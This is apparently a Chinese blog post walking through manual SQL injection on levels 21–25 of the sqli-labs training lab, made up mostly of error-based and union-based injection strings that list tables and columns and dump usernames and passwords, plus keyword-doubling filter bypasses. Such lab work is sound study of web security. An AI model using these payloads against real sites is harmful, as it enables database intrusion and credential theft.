sqlilabs less21-25关手工注入

一身傲骨@2024-08-26 21:37

第21关

一.登录页面

二 .Burp Suite 抓包,进入重放器

三.查询数据库 先进行编码

')and updatexml(1,concat(1,database()),1)#

四.查表,先进行编码

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

五.查列,先进行编码

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

六.查询users表中所有数据

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第22关

一.登录页面

二 .Burp Suite 抓包,进入重放器

三.查询数据库 先进行编码

"and updatexml(1,concat(1,database()),1)#

四.查表,先进行编码

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

五.查列,先进行编码

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

六.查询users表中所有数据

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第23关

一.看有无回显点

二查询数据库

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271

三.查表

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271

四.查列

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271

第24关

使用二次注入

一.注册用户

二.admin的密码被修改为777777

第25关

一.闭合方式为 单引号 '

http://127.0.0.1/Less-25/?id=1%27%20--+http://127.0.0.1/Less-25/?id=1%27%20--+

二.查询数据库

http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+

三. 查询库中所有表

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+

四.查询列

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+

相关推荐
AllWe$6 分钟前
九、Redis 的实际使用与Redis的设计
数据库·redis·缓存
u01330870937 分钟前
大模型训练数据库Common Crawl
数据库·语言模型
杨浦老苏1 小时前
跨平台数据库管理软件SQLynx
数据库·docker·群晖
Flying_Fish_roe1 小时前
Java中NoSQL 与分布式数据库
java·数据库·nosql
草木·君1 小时前
【SQL】百题计划:SQL排序Order by的使用。
数据库·sql
小时候的阳光1 小时前
Docker方式部署ProxySQL和Keepalived组合实现MGR的高可用访问
mysql·docker·keepalived·mgr·proxysql
好奇的菜鸟2 小时前
GORM安全-保护你的应用免受SQL注入攻击
数据库·sql·安全
机智的小神仙儿2 小时前
我是Redis,请看我和mysql是如何交互的吧~
redis·mysql·缓存·交互
程序员大金2 小时前
基于SpringBoot+Vue+MySQL的垃圾分类回收管理系统
java·vue.js·spring boot·后端·mysql·mybatis
盒马盒马2 小时前
MySQL:事务
数据库·mysql
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库022024年高教社杯数学建模国赛C题超详细解题思路分析03【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提04组基轨迹建模 GBTM的介绍与实现(Stata 或 R)05【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文062024 高教社杯 数学建模国赛 (A题)深度剖析|“板凳龙” 闹元宵|数学建模完整代码+建模过程全解全析07Coze扣子平台完整体验和实践(附国内和国际版对比)082024年高教杯国赛(C题)数学建模竞赛解题思路|完整代码论文集合092024 年高教社杯全国大学生数学建模竞赛题目-A 题 “板凳龙” 闹元宵10CCF-CSP认证考试 202406-3 文本分词 100分题解